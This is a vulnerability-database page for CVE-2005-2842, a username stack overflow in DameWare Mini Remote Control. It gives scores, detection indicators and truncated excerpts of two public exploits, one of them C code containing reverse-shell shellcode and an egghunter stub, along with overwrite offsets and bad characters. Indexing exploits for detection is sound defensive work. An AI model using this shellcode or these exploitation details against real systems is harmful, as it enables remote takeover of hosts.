CVE-2005-2842
Published 2005-09-08

CVE-2005-2842: Buffer overflow in dwrcs.exe in DameWare Mini Remote Control before 4.9.0 allows remote attackers to execute arbitrary code via the username.
- Priority: P351
- CVSS 2.0: 7.5 (high), vector AV:N/AC:L/Au:N/C:P/I:P/A:P
- Exploit: public exploit indexed
- EPSS: 21.12% (97.3rd percentile)
Affected (4 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dameware_development | mini_remote_control_server | — | — |
| dameware_development | mini_remote_control_server | — | — |
| dameware_development | mini_remote_control_server | — | — |
| dameware_development | mini_remote_control_server | — | — |
Detection & IOCs (extracted from sources)

- bytes: `\x30\x11\x00\x00\x00\x00\x00\x00\xd7\xa3\x70\x3d\x0a\xd7\x0d\x40`
- bytes: `\x30\x11\x00\x00\x00\x00\x00\x00\xC3\xF5\x28\x5C\x8F\xC2\x0D\x40`
- bytes: `\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x41\x42\x41\x42\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7`
- Exploit sends an oversized username (259-byte buffer with EIP overwrite at offset 100) to port 6129/TCP on dwrcs.exe; detect abnormally large username fields in DameWare protocol traffic on this port.
- Exploit packet begins with the 4-byte magic header `\x30\x11\x00\x00` at offset 0; this is a reliable network signature for both known exploit variants targeting CVE-2005-2842.
- Egghunter tag `\x41\x42\x41\x42` (ABAB) is used as the egg marker in the shellcode; scanning process memory or network payloads for this tag alongside the egghunter stub can identify exploitation attempts.
- BadChars for the payload are `\x00\x0a\x0d`; any payload on port 6129 containing long runs of non-null bytes without these characters in the username field should be treated as suspicious.
- The Metasploit module targets only Windows XP SP3 EN with a single hardcoded return address; the standalone exploit (EDB-1190) includes additional offsets for WIN 2000, WIN 2003, and WIN NT4, but several are marked unknown/placeholder.
- The standalone exploit author notes the return address offsets 'Could proberly be doing with some better offsets', indicating reliability issues on some target OS versions.
- Payload compatibility requires the ws2ord symbol lookup method; standard reverse shells not using ws2_32 ordinal resolution will fail.
No detection rules found.
Exploit-DB · 2017-09-13: Dameware Mini Remote Control 4.0 - Username Stack Buffer Overflow (Metasploit)
---
```ruby
require 'msf/core'
class MetasploitModule 'Dameware Mini Remote Control Username Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow vulnerability found
in Dameware Mini Remote Control v4.0. The overflow is caused when sending
an overly long username to the DWRCS executable listening on port 6129.
The username is read into a strcpy() function causing an overwrite of
the return pointer leading to arbitrary code execution.
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'CVE', '2005-2842' ],
[ 'BID', '14707' ],
[ 'URL', 'http://secunia.com/advisories/16655' ],
[ 'URL', 'http://archives.neohapsis.com/arch
```
Exploit-DB · 2005-08-31: DameWare Mini Remote Control 4.0 < 4.9 - Client Agent Remote Overflow
```c
#include
#include
#pragma comment(lib,"ws2_32")
#define ACCEPT_TIMEOUT 25
#define RECVTIMEOUT 15
#define UNKNOWN 0
#define WIN2K 1
#define WINXP 2
#define WIN2K3 3
#define WINNT 4
unsigned char rshell[] = {
"\x41\x42\x41\x42\x41\x42\x41\x42\x90\x90\x90\x90\x90\x90\x90\x90" // For The Egghunter
"\x90\xFC\x6A\xEB\x52\xE8\xF9\xFF\xFF\xFF\x60\x8B\x6C\x24\x24\x8B" // Reverse Shell
"\x45\x3C\x8B\x7C\x05\x78\x01\xEF\x83\xC7\x01\x8B\x4F\x17\x8B\x5F"
"\x1F\x01\xEB\xE3\x30\x49\x8B\x34\x8B\x01\xEE\x31\xC0\x99\xAC\x84"
"\xC0\x74\x07\xC1\xCA\x0D\x01\xC2\xEB\xF4\x3B\x54\x24\x28\x75\xE3"
"\x8B\x5F\x23\x01\xEB\x66\x8B\x0C\x4B\x8B\x5F\x1B\x01\xEB\x03\x2C"
"\x8B\x89\x6C\x24\x1C\x61\xC3\x31\xC0\x64\x8B\x40\x30\x8B\x40\x0C"
"\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\x68\x8E\x4E\x0E\x
```
No writeups or analysis indexed.
References

- http://archives.neohapsis.com/archives/fulldisclosure/2005-08/1074.html
- http://secunia.com/advisories/16655
- http://securitytracker.com/id?1014830
- http://www.jpno5.com/Releases/Public/Exploits/Dameware%20Mini%20Remote%20Control%20Exploit/dameware.txt
- http://www.kb.cert.org/vuls/id/170905
- http://www.securityfocus.com/bid/14707
- http://www.vupen.com/english/advisories/2005/1596
- https://www.exploit-db.com/exploits/42703/